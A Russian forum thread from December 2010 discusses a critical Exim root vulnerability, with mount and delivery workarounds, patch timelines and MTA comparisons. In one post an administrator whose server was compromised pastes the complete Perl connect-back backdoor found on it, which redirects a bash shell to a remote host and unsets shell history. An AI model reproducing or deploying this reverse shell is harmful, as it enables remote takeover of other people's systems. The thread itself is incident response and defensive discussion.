>>> при этом потеряется огромное количество писем и я даже не смогу
>>> сказать что именно было потеряно.
>> для меня - тока в одном месте эта потеря являтся критической.
>> но там /var отдельно.
> ууу... еще и вар не отдельной фс, как все печально у вас,
> однако.

та. последнее время стал старый и ленивый, и балуюсь таким

srv0$ df -h
Filesystem             Size    Used   Avail Capacity  Mounted on
/dev/label/rootFS       15G    5.0G    8.4G    37%    /
devfs                  1.0K    1.0K      0B   100%    /dev
/dev/label/homeFS      117G     49G     58G    46%    /home
tmpfs                  7.0G    620K    7.0G     0%    /tmp
linprocfs              4.0K    4.0K      0B   100%    /proc

Ответить | Правка | ^ к родителю #111 | Наверх | Cообщить модератору

51. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от zazik (ok), 10-Дек-10, 10:13 
> ... а если спул exim-а находится на разделе на который нет возможности
> поставить nosuid . Как в этом случае быть? (не удаляя exim
> ^)

Увольняться! Потому что это говорит о профнепригодности. Смешивать разделы с данными и с программами - зло.

Ответить | Правка | ^ к родителю #45 | Наверх | Cообщить модератору

76. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Аноним (-), 10-Дек-10, 15:49 
>> ... а если спул exim-а находится на разделе на который нет возможности
>> поставить nosuid . Как в этом случае быть? (не удаляя exim
>> ^)
> Увольняться! Потому что это говорит о профнепригодности. Смешивать разделы с данными и
> с программами - зло.

хе, а тут порой появляются умники, которые с пеной у рта доказывают, что один раздел под все - это правильно.

Ответить | Правка | ^ к родителю #51 | Наверх | Cообщить модератору

78. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от PereresusNeVlezaetBuggyemail (ok), 10-Дек-10, 16:22 
>>> ... а если спул exim-а находится на разделе на который нет возможности
>>> поставить nosuid . Как в этом случае быть? (не удаляя exim
>>> ^)
>> Увольняться! Потому что это говорит о профнепригодности. Смешивать разделы с данными и
>> с программами - зло.
> хе, а тут порой появляются умники, которые с пеной у рта доказывают,
> что один раздел под все - это правильно.

Ну и пусть доказывают. Сразу видно, что они ничего серьёзнее своего десктопа с игрушками и крякнутым Фотошопом никогда не админили.

Ответить | Правка | ^ к родителю #76 | Наверх | Cообщить модератору

79. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от zazik (ok), 10-Дек-10, 17:45 
> хе, а тут порой появляются умники, которые с пеной у рта доказывают,
> что один раздел под все - это правильно.

Если они из контор по восстановлению данных и поднятию упавших систем, то вполне себе умники. Бизнес, ничего личного.

Ответить | Правка | ^ к родителю #76 | Наверх | Cообщить модератору

113. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +1 +/
Сообщение от SubGun (??), 12-Дек-10, 00:57 
Иногда лучше все вместе, иногда отдельно. А иногда вообще на отдельном диске. Зависит от обстоятельств.
Ответить | Правка | ^ к родителю #76 | Наверх | Cообщить модератору

116. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от zazik (ok), 13-Дек-10, 09:21 
> Иногда лучше все вместе, иногда отдельно. А иногда вообще на отдельном диске.
> Зависит от обстоятельств.

Не вижу никаких доводов в пользу установки всего на один раздел.

Ответить | Правка | ^ к родителю #113 | Наверх | Cообщить модератору

53. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Аноним (-), 10-Дек-10, 11:10 
FreeBSD:

# mount -t nullfs -o nosuid /var/nosuid /nosuid
# mount | grep -i nosuid
/var/nosuid on /nosuid (nullfs, local, nosuid)

# /usr/local/etc/rc.d/exim stop
# mv /var/spool/exim /nosuid/
# ln -s /nosuid/exim /var/spool/exim
# ls -lF /var/spool/exim
lrwxr-xr-x  1 root  wheel  12 Dec 10 13:19 /var/spool/exim@ -> /nosuid/exim

# /usr/local/etc/rc.d/exim start

Вот и всё.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

54. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Eximemail (??), 10-Дек-10, 11:27 
А на RH/Centos ?
Ответить | Правка | ^ к родителю #53 | Наверх | Cообщить модератору

62. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Аноним (-), 10-Дек-10, 12:25 
Скорее
# ln -s /var/nosuid/exim /var/spool/exim

Ответить | Правка | ^ к родителю #53 | Наверх | Cообщить модератору

64. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от poz (?), 10-Дек-10, 12:42 
> Скорее
> # ln -s /var/nosuid/exim /var/spool/exim

Уверен? Точка монтирования /nosuid и через нее нужно обращаться.

Ответить | Правка | ^ к родителю #62 | Наверх | Cообщить модератору

77. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Аноним (-), 10-Дек-10, 15:55 
>[оверквотинг удален]
> # mount | grep -i nosuid
> /var/nosuid on /nosuid (nullfs, local, nosuid)
> # /usr/local/etc/rc.d/exim stop
> # mv /var/spool/exim /nosuid/
> # ln -s /nosuid/exim /var/spool/exim
> # ls -lF /var/spool/exim
> lrwxr-xr-x  1 root  wheel  12 Dec 10 13:19 /var/spool/exim@
> -> /nosuid/exim
> # /usr/local/etc/rc.d/exim start
> Вот и всё.

поставь nosuid на весь /var, и успокойся, и вообще это должно быть сделано по умолчанию.

Ответить | Правка | ^ к родителю #53 | Наверх | Cообщить модератору

55. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от eugene (??), 10-Дек-10, 11:47 

если нет возможности на спул поставить nosuid
как решение можно сделать так
1. сделать и настроить транспорт на lmtp (это нужно если ексим сам доставляет почту по майлбоксам  под другим юзером локально)
2. снять суид с бинарника exm

например роутер такой
localuser:
    driver = accept
    condition = ${lookup sqlite {/etc/exim/mail.db \                                                                                                      
      SELECT userid FROM mailusers WHERE userid='$local_part@$domain' AND smtp_allow='true'}}
убираем доставку самим эксимом    #transport = maildir_delivery
    transport = lmtp_delivery                                                                                                                              
    cannot_route_message = Unknown mail user


и в транспортах
lmtp_delivery:
    driver=smtp
    protocol=lmtp
    port = 24
    hosts=127.0.0.1
    allow_localhost
    return_path_add

после чего снимает suid с бинарника

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

56. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от eugene (??), 10-Дек-10, 11:49 
> и в транспортах
> lmtp_delivery:
>     driver=smtp
>     protocol=lmtp
>     port = 24
>     hosts=127.0.0.1
>     allow_localhost
>     return_path_add
> после чего снимаем suid с бинарника

ну и само собой нужно настроить dovecot или что там у вас на доставку по lmtp

Ответить | Правка | ^ к родителю #55 | Наверх | Cообщить модератору

57. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Az (??), 10-Дек-10, 11:55 
а вот так не канает (тем, у кого var на том же разделе)?

service exim stop
mv /var/spool/exim /var/spool/exim2
mkdir /var/spool/exim
mount --bind /var/spool/exim2 /var/spool/exim -o nosuid
service exim start

Есть смысл так заворкэраундиться, простите мой хранцузский? :)

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

58. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от eugene (??), 10-Дек-10, 12:10 
тоже неплохо,
но в моем способе вообще suid с бинарника убрать можно.
Ответить | Правка | ^ к родителю #57 | Наверх | Cообщить модератору

61. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Az (??), 10-Дек-10, 12:17 
попробовал убирать суид с бинарника - не может запустить cyrus-доставку, потому как она вызывается с правами пользователя cyrus. пробовал менять на пользователя exim - не может попасть в /var/spool/imap. Добавил exim в группу mail и дал права группе на /var/spool/imap - все равно не работает доставка, ругается что не может обработать aliases, правов не хватает. пришлось таки вернуть suid.
Ответить | Правка | ^ к родителю #58 | Наверх | Cообщить модератору

85. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Аноним (-), 10-Дек-10, 18:54 
> mount --bind /var/spool/exim2 /var/spool/exim -o nosuid

это не работает. suid атрибут всё равно можно ставить.

Ответить | Правка | ^ к родителю #57 | Наверх | Cообщить модератору

115. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Ололо (?), 13-Дек-10, 07:48 
Так ведь suid-бит лишь дает право запуска с правами владельца, а системный вызов должен перемножить атрибуты файловой системы с атрибутами файла.
Если перевести на руссский, то это означает, что suid-ный бинарник на nosuid работать не будет.
Ответить | Правка | ^ к родителю #85 | Наверх | Cообщить модератору

63. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +1 +/
Сообщение от xz (??), 10-Дек-10, 12:41 
> В популярном почтовом сервере Exim найдена

Паникеры.

1) Быдловендоры всяких дебианов думают что они самые умные и им не надо обновлять софт в своих репозитариях. Бага пофикшена в 4.70, т.е. 2 версии назад - http://www.exim.org/lurker/message/20101210.082649.17829396....

2) Ремотный рут опять же возможен только в том-же дебиане, ибо парсят HeaderX
http://www.exim.org/lurker/message/20101209.112914.68af6769....

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

65. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от sammemail (ok), 10-Дек-10, 12:45 
Вот-вот.
Я даже новость "исправил", но изменения так и не были приняты...
Ответить | Правка | ^ к родителю #63 | Наверх | Cообщить модератору

66. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от tux2002email (ok), 10-Дек-10, 13:11 
>> В популярном почтовом сервере Exim найдена
> Паникеры.
> 1) Быдловендоры всяких дебианов думают что они самые умные и им не
> надо обновлять софт в своих репозитариях. Бага пофикшена в 4.70, т.е.
> 2 версии назад - http://www.exim.org/lurker/message/20101210.082649.17829396....

Дело не в этом, а в архитектурном решении доставки почты в exim. В бумажной почте почтальон не прикидывается пользователем, чтобы положить письмо в почтовый ящик, для него существует щёлочка - o+w. И тут тоже должны быть права на запись в почтовый ящик например группе mail. У меня вообще exim запускается sudo -u mail exim -bd; sudo -u mail exim -qq10m (с CAP_NET_BIND_SERVICE) и никаких рутовых setuid ов. Если процесс не имеет начальных привелегий рут, ломать сложнее.


Ответить | Правка | ^ к родителю #63 | Наверх | Cообщить модератору

67. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +1 +/
Сообщение от Аноним (-), 10-Дек-10, 13:21 
> Паникеры.

Вина целиком на разработчиках Exim, молча исправивших такую огромную дыру. В примечании к релизу 4.70 даже намеков не было. Но судя по тексту багрепорта (http://bugs.exim.org/show_bug.cgi?id=787), об опасности этой проблемы знали, но намеренно не придали огласке.

Ответить | Правка | ^ к родителю #63 | Наверх | Cообщить модератору

68. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от sammemail (ok), 10-Дек-10, 13:45 
У вас какой-то свой, особенный changelog.

Вот тут все более чем ясно: ftp://ftp.exim.org/pub/exim/ChangeLogs/ChangeLog-4.70

NM/09 Bugzilla 787: Potential buffer overflow in string_format
      Patch provided by Eugene Bujak


Или они должны были сообщить об этом по CNN в Prime Time?

Ответить | Правка | ^ к родителю #67 | Наверх | Cообщить модератору

86. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Аноним (-), 10-Дек-10, 19:02 
Потенциальное переполнение буфера и удалённый root — это разные вещи. Разработчики exim пытались скрыть факты, это очевидно.
Ответить | Правка | ^ к родителю #68 | Наверх | Cообщить модератору

88. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +1 +/
Сообщение от sammemail (ok), 10-Дек-10, 19:27 
> Потенциальное переполнение буфера и удалённый root — это разные вещи. Разработчики
> exim пытались скрыть факты, это очевидно.

А еще они убили Лору Палмер и взорвали башни-близнецы. Те кто не в танке - прекрасно понимают, что переполнение буфера у suid процесса может в итоге дать рут. Эксплоит был типичный 0day, а фикс был помечен как теоретическая возможность использования. То, что мейнтейнер пакета спал и считал что переполнение буфера не является security issue и бекпортить фикс не нужно - проблема исключительно его и всех дебиан stable юзеров по совместительству. Либо надо обновлять версию (как в портах во фре, например), либо следить за changelogs и бекпортить подобные патчи.

Ответить | Правка | ^ к родителю #86 | Наверх | Cообщить модератору

90. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +1 +/
Сообщение от shsm (?), 10-Дек-10, 20:05 
>> В популярном почтовом сервере Exim найдена
> Паникеры.
> 1) Быдловендоры всяких дебианов думают что они самые умные и им не
> надо обновлять софт в своих репозитариях. Бага пофикшена в 4.70, т.е.
> 2 версии назад - http://www.exim.org/lurker/message/20101210.082649.17829396....
> 2) Ремотный рут опять же возможен только в том-же дебиане, ибо парсят
> HeaderX
> http://www.exim.org/lurker/message/20101209.112914.68af6769....

В Дебиане уже все пофикшено.

exim4 (4.69-9+lenny1) stable-security; urgency=high

  * Non-maintainer upload by the Security Team.
  * Fix SMTP file descriptors being leaked to processes invoked with ${run...}
  * Fix memory corruption issue in string_format(). CVE-2010-4344
  * Fix potential memory pool corruption issue in internal_lsearch_find().

-- Stefan Fritsch <sf@debian.org>  Fri, 10 Dec 2010 13:25:07 +0100

Ответить | Правка | ^ к родителю #63 | Наверх | Cообщить модератору

122. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Аноним (-), 15-Дек-10, 07:41 
>[оверквотинг удален]
>> HeaderX
>> http://www.exim.org/lurker/message/20101209.112914.68af6769....
> В Дебиане уже все пофикшено.
> exim4 (4.69-9+lenny1) stable-security; urgency=high
>   * Non-maintainer upload by the Security Team.
>   * Fix SMTP file descriptors being leaked to processes invoked
> with ${run...}
>   * Fix memory corruption issue in string_format(). CVE-2010-4344
>   * Fix potential memory pool corruption issue in internal_lsearch_find().
>  -- Stefan Fritsch <sf@debian.org>  Fri, 10 Dec 2010 13:25:07 +0100

Это должно было бы пофиксено два Exim`овскиз релиза назад, а не когда за яйца уже схватили!!!!!!!!! Обновления безопасности же наверно не так просто выходят, а?

Ответить | Правка | ^ к родителю #90 | Наверх | Cообщить модератору

70. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +/
Сообщение от Kirill (??), 10-Дек-10, 14:27 
Стесьняюсь уточнить один вопрос - в заголовке сказано, что исправлено в 4.70, а в тексте новости говорится, что подвержен 4.72.
Так как же обстоит на самом деле?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

72. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +/
Сообщение от Аноним (-), 10-Дек-10, 15:28 
Там две разные дыры, в 4.70 поправлена удаленная уязвимость, а в 4.72 остается локальная фича, через которую можно поднять привилегии.
Ответить | Правка | ^ к родителю #70 | Наверх | Cообщить модератору

82. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  –1 +/
Сообщение от sHaggY_caT (ok), 10-Дек-10, 18:35 
Нда... Все-таки Postfix, когда не нужна большая производительность, рулит, т.к. не монолитный, как Exim.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

87. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +/
Сообщение от bers666email (?), 10-Дек-10, 19:27 
> Нда... Все-таки Postfix, когда не нужна большая производительность, рулит, т.к. не монолитный,
> как Exim.

Когда в Postfix-е сделают поддержку скриптового языка и поменяют формат лога, можно будет подумать.

Ответить | Правка | ^ к родителю #82 | Наверх | Cообщить модератору

93. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +/
Сообщение от sHaggY_caT (ok), 11-Дек-10, 02:04 
> Когда в Postfix-е сделают поддержку скриптового языка и поменяют формат лога, можно
> будет подумать.

Имхо, любую задачу можно решить штатными средствами + через транспорты на внешние скрипты. Только эта схема далеко не всегда будет работать быстро.

А что не так с логами? Есть анализаторы, тот же  postfix-pflogsumm, при этом он далеко не единственный.

Ответить | Правка | ^ к родителю #87 | Наверх | Cообщить модератору

92. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +2 +/
Сообщение от artemrts (ok), 10-Дек-10, 22:28 
> Нда... Все-таки Postfix, когда не нужна большая производительность, рулит, т.к. не монолитный,
> как Exim.

Не смешите, по поводу производительности. В Постфиксе с этим все гуд. Уступает он Эксиму только в гибкости конфигурации.

Ответить | Правка | ^ к родителю #82 | Наверх | Cообщить модератору

94. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +/
Сообщение от sHaggY_caT (ok), 11-Дек-10, 02:12 
>> Нда... Все-таки Postfix, когда не нужна большая производительность, рулит, т.к. не монолитный,
>> как Exim.
> Не смешите, по поводу производительности.

Я не строила _больших_ систем на Postfix или Exim, только маштаба SMB-офиса(под сотню активных ящиков). Но моим коллегой был человек, который такую систему (тысяч 40 активных доменов) строил. По крайней мере рядом с НЕ монолитным Qmail Exim выглядит гораздо более быстрым уже по моему собственному опыту эксплуатации (уже существующей) большой системы.
Это его мнение, что Exim быстрее, чем Postfix, и в данном случае, я ему склонна верить, так как уважаю его профессионализм.

Вот думаю: а может, в случае чего-то большего или среднего по маштабу, стоит использовать Exim как Smart-хост, только маршрутизирующий почту на внутренний почтовый сервер, вроде Postfix или Zimbra? Как это часто делают с Posftix или Exim для тормозного вендового Exchange? Хотя бы с точки зрения безопасности, при сохранении гибкости и производительности, эта схема должна быть более правильной (имхо), в крайнем случае, злоумышленник сможет только поспамить, и прочитать несколько писем в очереди Exim. Разумеется, Exim при этом предполагается в другом chroot/контейнере, или вообще в другой системе.

Ответить | Правка | ^ к родителю #92 | Наверх | Cообщить модератору

101. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +/
Сообщение от Viliar (ok), 11-Дек-10, 16:59 
> Вот думаю: а может, в случае чего-то большего или среднего по маштабу,
> стоит использовать Exim как Smart-хост, только маршрутизирующий почту на внутренний...

Не стоит. Postfix вполне справится и сам. Вот, кстати, суточная статистика с одного из mx'ов не-скажу-где :-), не самая большая, понятное дело, бывало и больше :-)

Total:
        Total Connects In: 3193185 from 512174 hosts
        Total Rejected Mail: 2920453
        Total Greylisted Mail: 33055
        Total Received Mail: 34790
        Total Received Mail from Whitelisted: 16803


Ответить | Правка | ^ к родителю #94 | Наверх | Cообщить модератору

105. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +/
Сообщение от artemrts (ok), 11-Дек-10, 17:07 
>[оверквотинг удален]
> одного из mx'ов не-скажу-где :-), не самая большая, понятное дело, бывало
> и больше :-)
> Total:
>         Total Connects In: 3193185
> from 512174 hosts
>         Total Rejected Mail: 2920453
>         Total Greylisted Mail: 33055
>         Total Received Mail: 34790
>         Total Received Mail from
> Whitelisted: 16803

   А если не секрет, на чем реализован грейлистинг?

Ответить | Правка | ^ к родителю #101 | Наверх | Cообщить модератору

108. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +/
Сообщение от Viliar (ok), 11-Дек-10, 17:32 
>[оверквотинг удален]
>> и больше :-)
>> Total:
>>         Total Connects In: 3193185
>> from 512174 hosts
>>         Total Rejected Mail: 2920453
>>         Total Greylisted Mail: 33055
>>         Total Received Mail: 34790
>>         Total Received Mail from
>> Whitelisted: 16803
>    А если не секрет, на чем реализован грейлистинг?

milter-greylist. gps postfix daemon чего-то там со своими форками оказался ужас нах под текущей нагрузкой. А этот, с тредами и через milter очень хорош. Только хотелось оторвать мейнтейнеру фряшного порта руки, за то, что по-умолчанию дамп сбрасывается каждую минуту :-) Поставил 10 минут - все прекрасно.

Ответить | Правка | ^ к родителю #105 | Наверх | Cообщить модератору

91. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +1 +/
Сообщение от Аноним (-), 10-Дек-10, 21:04 
а если пошаманить с ALT_CONFIG_PREFIX? по идее ни удаленно (когда exim уже сбросил привелегии), ни локально в директорию, доступную для записи только руту (где основной конфиг exim, к примеру) нету.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

96. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +/
Сообщение от tux2002email (ok), 11-Дек-10, 11:23 
> а если пошаманить с ALT_CONFIG_PREFIX? по идее ни удаленно (когда exim уже
> сбросил привелегии), ни локально в директорию, доступную для записи только руту
> (где основной конфиг exim, к примеру) нету.

Я по памяти, когда читал документацию, помню, что запускать с альтернативным конфигом могут только admin users и входящие в первичную группу пользователя exim. Или не так?

Ответить | Правка | ^ к родителю #91 | Наверх | Cообщить модератору

98. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +/
Сообщение от faemail (??), 11-Дек-10, 15:29 
>подтверждена ошибка только в Debian

В CentOS она тоже есть.

https://www.centos.org/modules/newbb/viewtopic.php?topic_id=...

https://rhn.redhat.com/errata/RHSA-2010-0970.html

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

104. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +/
Сообщение от Аноним (-), 11-Дек-10, 17:05 
Хорошо бы уточнить версии Exim и CentOS
Ответить | Правка | ^ к родителю #98 | Наверх | Cообщить модератору

114. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +/
Сообщение от faemail (??), 12-Дек-10, 03:05 
По ссылкам ходили?
Ответить | Правка | ^ к родителю #104 | Наверх | Cообщить модератору

99. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  –2 +/
Сообщение от deadless (?), 11-Дек-10, 15:41 
как хорошо что я на postfix сижу.. было у меня 6 лет назад предубеждение к экзиму, гг.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

100. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +/
Сообщение от ALex_hha (ok), 11-Дек-10, 16:07 
Ты  думаешь твой сервер на 10 человек кому то нужен? Тогда мы идем к вам :)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

102. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +/
Сообщение от Viliar (ok), 11-Дек-10, 17:00 
> Ты  думаешь твой сервер на 10 человек кому то нужен? Тогда
> мы идем к вам :)

С возвращением, товарисч :) Как, ваше мнение с предыдущего топика не изменилось?

Ответить | Правка | ^ к родителю #100 | Наверх | Cообщить модератору

107. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +/
Сообщение от lissyaraemail (?), 11-Дек-10, 17:19 
>> Ты  думаешь твой сервер на 10 человек кому то нужен? Тогда
>> мы идем к вам :)
> С возвращением, товарисч :) Как, ваше мнение с предыдущего топика не изменилось?

товарисч - идолопоклонник рхела.
у таких - мнение не меняется =))

Ответить | Правка | ^ к родителю #102 | Наверх | Cообщить модератору

118. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +/
Сообщение от ALex_hha (ok), 13-Дек-10, 16:06 
> товарисч - идолопоклонник рхела.
> у таких - мнение не меняется =))

дак на FreeBSD те же грабли :D Почитай список рассылки ;)

Ответить | Правка | ^ к родителю #107 | Наверх | Cообщить модератору

103. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +/
Сообщение от ALex_hha (ok), 11-Дек-10, 17:04 
Нет, ибо мой топик был относительно того времени, когда экзим разрабатывал Хазель. Вот когда Венема уйдет и забросит postfix, тогда и поговорим ;)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

117. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +/
Сообщение от Аноним (-), 13-Дек-10, 13:17 
И Claus Assmann MeTA1?
Ответить | Правка | ^ к родителю #103 | Наверх | Cообщить модератору

119. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  –1 +/
Сообщение от mega4elemail (ok), 14-Дек-10, 20:04 
Блин, поломали.
Стоит CentOS release 5.4 (Final) с exim 4.63-3.el5. Залили в /tmp/c.pl какой-то бэкдор:
cat /tmp/c.pl
#!/usr/bin/perl
use IO::Socket;
#   Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90
# Email:LorD@ihsteam.com
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/bash';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--  \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF

В процессах было как:
exim     32133 99.8  0.0  88560  4064 ?        R    19:04  26:38 /usr/sbin/apache2/log
Херачило на всю катушку.

Процесс грохнул. Экзим обновил до exim.x86_64 0:4.63-5.el5_5.2. В /usr/sbin/ ничего похожего нет.
Поискал по овнеру exim, нашел некоторые следы деятельности в /var/spool/exim/
Сейчас никаких левых процессов и коннектов нет.
Подскажите как еще проверить систему на чистоту?

Подскажите как

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

121. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Аноним (-), 15-Дек-10, 07:39 
Переставить систему
Ответить | Правка | ^ к родителю #119 | Наверх | Cообщить модератору

123. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +/
Сообщение от pashaemail (??), 16-Дек-10, 14:49 
также систему на centos поломали. есть ли версия 4.70 exim.x86_64 для centos??
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

125. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +/
Сообщение от Аноним (-), 19-Дек-10, 03:11 
> также систему на centos поломали. есть ли версия 4.70 exim.x86_64 для centos??

Для CentOS вышло обновление. Это не 4.70, но уязвимость там пофикшена.

Ответить | Правка | ^ к родителю #123 | Наверх | Cообщить модератору

124. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +/
Сообщение от pashaemail (??), 16-Дек-10, 15:45 
ещё и dovecot накрылся(( вся входящая почта пропала и новые письма не приходят( это только у меня такой эффект вышел?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

127. "В Exim обнаружена критическая уязвимость (дополнено - пробле..."  +/
Сообщение от Начинающийemail (??), 10-Июн-19, 21:36 
Вопрос к профессионалам от Нуба
Можно ли защититься от этой проблемы косвенным образом.
Чтобы не перехватили root - Поставить при авторизации  запрет на доступ для всех по IP кроме одного своего ?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Спонсоры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2022 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру